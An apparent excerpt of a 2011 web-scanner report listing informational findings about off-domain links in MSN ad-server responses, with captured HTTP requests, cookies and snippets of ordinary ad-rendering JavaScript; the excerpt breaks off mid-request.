P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:41:15 GMT
Content-Length: 2786


//<![CDATA[
function getRADIds() { return{"adid":"47000000000040614","pid":"8370651","targetid":"8192380"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2047363577() {var adCode_2047363577=new Array();adCode_2047363577.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00047/47000000000040614.1?!&amp;&amp;PID=8370651&amp;UIT=G&amp;TargetID=8192380&amp;AN=2047363577&amp;PG=CP49XU&amp;ASID=592c970828da41888e4fe12bfdeb5382&destination=;ord=2047363577?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_2047363577.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;abr=!ie;sz=300x250;click=;dcopt=rcl;click0=http://wrap
...[SNIP]...

19.81. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=MSNREC&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 995
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8630498-T8352780-C8000000000039194
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:29 GMT
Content-Length: 995


//<![CDATA[
function getRADIds() { return{"adid":"8000000000039194","pid":"8630498","targetid":"8352780"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}
tr
...[SNIP]...
<a href="http://g.msn.com/2AD0004F/8000000000039194.1??PID=8630498&amp;UIT=G&amp;TargetID=8352780&amp;AN=1209027218&amp;PG=MSNREC&amp;ASID=915a24574f594535aac9dae960e0a654" target="_blank"><img src="http://ads2.msads.net/CIS/30/000/000/000/008/439.gif" width="300" height="250" alt="Click here!" border="0" /></a></div>');document.write('<img src="http://ad.doubleclick.net/ad/N4492.MSN/B5014254.97;sz=1x1;ord=1209027218?" alt="" height="1" width="1" style="display:none;" />');


document.close();

//]]>
...[SNIP]...

19.82. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=MSNHQ2&AP=1402 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1042
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8479954-T22841720-C4000000000033190
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:29 GMT
Content-Length: 1042


//<![CDATA[
function getRADIds() { return{"adid":"4000000000033190","pid":"8479954","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
tr
...[SNIP]...
<a href="http://g.msn.com/2AD0003S/4000000000033190.1??PID=8479954&amp;UIT=G&amp;TargetID=22841720&amp;AN=185076156&amp;PG=MSNHQ2&amp;ASID=1699c0bf611845388d1238dff52d7f8b" target="_blank"><img src="http://ads2.msads.net/CIS/79/000/000/000/008/787.gif" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a></div>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/185076156" alt="" height="1" width="1" style="display:none;" />');


document.close();

//]]>
...[SNIP]...

19.83. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVPC1&AP=1455 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 842
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8050733-T28253484-C119000000000027746
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:40:03 GMT
Content-Length: 842


//<![CDATA[
function getRADIds() { return{"adid":"119000000000027746","pid":"8050733","targetid":"28253484"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}

...[SNIP]...
<a href="http://g.msn.com/2AD0003K/119000000000027746.1??PID=8050733&amp;UIT=G&amp;TargetID=28253484&amp;AN=1611336703&amp;PG=INVPC1&amp;ASID=47bc56c01aec4f87a52160b565f69751" target="_blank"><img src="http://ads2.msads.net/CIS/98/000/000/000/011/663.gif" width="300" height="60" alt="click here" border="0" /></a>
...[SNIP]...

19.84. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37; FC06=FB=AgEAtw4Q67gB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1293
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8306099-T30580561-C1691227
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:53 GMT
Content-Length: 1293


//<![CDATA[
var contents_16 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1691227.1?!&amp;&amp;PID=8306099&amp;UIT=G&amp;TargetID=30580561&amp;AN=33688103&amp;PG=INVXTA">Scottrade: Op
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.835.tk.TEXT/33688103" height="1" width="1" style="display:none;" />';
var fh_16 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

19.85. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=HEAP01&AP=1390 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgIAtw5ZB7gB3fW4AQ; FC05=FB=AgEAtw4P67gB; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2416
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P3825592-T37386025-C100000000000028806
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:45:14 GMT
Content-Length: 2416


//<![CDATA[
function getRADIds() { return{"adid":"100000000000028806","pid":"3825592","targetid":"37386025"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1124074232() {var adCode_1124074232=new Array();adCode_1124074232.push('<iframe src="http://view.atdmt.com/APM/iview/110247222/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_1124074232.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1124074232.push('document.write(\'<a href="http://clk.atdmt.com/APM/go/110247222/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/APM/view/110247222/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

19.86. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&AP=1455&PG=INVTDA HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37; FC01=FB=AgIAtw5ZB7gB3fW4AQ; FC05=FB=AgEAtw4P67gB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 838
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7703209-T26619569-C77000000000032070
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:40:29 GMT
Content-Length: 838


//<![CDATA[
function getRADIds() { return{"adid":"77000000000032070","pid":"7703209","targetid":"26619569"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0002Y/77000000000032070.1??PID=7703209&amp;UIT=G&amp;TargetID=26619569&amp;AN=554238591&amp;PG=INVTDA&amp;ASID=3d021fbcb92648a5ad2c965274002d0a" target="_blank"><img src="http://ads2.msads.net/CIS/59/000/000/000/008/963.gif" width="300" height="60" alt="Click here!" border="0" /></a>
...[SNIP]...

19.87. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=REAB01&AP=1390 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2004
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8584152-T8387559-C113000000000040404
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:18 GMT
Content-Length: 2004


//<![CDATA[
function getRADIds() { return{"adid":"113000000000040404","pid":"8584152","targetid":"8387559"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1243611902() {var adCode_1243611902=new Array();adCode_1243611902.push('<IFRAME MARGINWIDTH="0" MARGINHEIGHT="0" HEIGHT="90" FRAMEBORDER="0" WIDTH="728" SCROLLING="no" SRC="http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902"></IFRAME>
...[SNIP]...

19.88. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVHP4&AP=1402 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 818
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7989434-T30569359-C80000000000018486
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:52 GMT
Content-Length: 818


//<![CDATA[
function getRADIds() { return{"adid":"80000000000018486","pid":"7989434","targetid":"30569359"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
try
...[SNIP]...
<a href="http://g.msn.com/2AD0001R/80000000000018486.1??PID=7989434&amp;UIT=G&amp;TargetID=30569359&amp;AN=721961100&amp;PG=INVHP4&amp;ASID=8e8e495454ed4895b1338a913d7feed3" target="_blank"><img src="http://ads2.msads.net/CIS/20/000/000/000/001/150.gif" width="1" height="1" alt="dot" border="0" /></a>
...[SNIP]...

19.89. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=MSNHP4&AP=1455 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2443
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8602268-T41632011-C117000000000051416
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:41 GMT
Content-Length: 2443


//<![CDATA[
function getRADIds() { return{"adid":"117000000000051416","pid":"8602268","targetid":"41632011"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 120);if(par
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_169427911() {var adCode_169427911=new Array();adCode_169427911.push('<iframe src="http://view.atdmt.com/CNT/iview/319104106/direct;pc.106305558;wi.300;hi.120/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="120">\n');adCode_169427911.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_169427911.push('document.write(\'<a href="http://clk.atdmt.com/CNT/go/319104106/direct;pc.106305558;wi.300;hi.120/01/" target="_blank"><img src="http://view.atdmt.com/CNT/view/319104106/direct;pc.106305558;wi.300;hi.120/01/"/></a>
...[SNIP]...

19.90. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=MSNIF1&AP=1455 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 840
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P6574135-T21144173-C93000000000043896
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:30 GMT
Content-Length: 840


//<![CDATA[
function getRADIds() { return{"adid":"93000000000043896","pid":"6574135","targetid":"21144173"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD00045/93000000000043896.1??PID=6574135&amp;UIT=G&amp;TargetID=21144173&amp;AN=1663060301&amp;PG=MSNIF1&amp;ASID=bad232e9dfae405fba93bb154e02dd75" target="_blank"><img src="http://ads2.msads.net/CIS/83/000/000/000/014/100.jpg" width="300" height="60" alt="Click here!" border="0" /></a>
...[SNIP]...

19.91. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37; FC06=FB=AgEAtw4Q67gB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1295
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8306099-T30580561-C1691227
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:13 GMT
Content-Length: 1295


//<![CDATA[
var contents_16 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1691227.1?!&amp;&amp;PID=8306099&amp;UIT=G&amp;TargetID=30580561&amp;AN=572721895&amp;PG=INVXTA">Scottrade: O
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.835.tk.TEXT/572721895" height="1" width="1" style="display:none;" />';
var fh_16 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

19.92. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVLHP&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
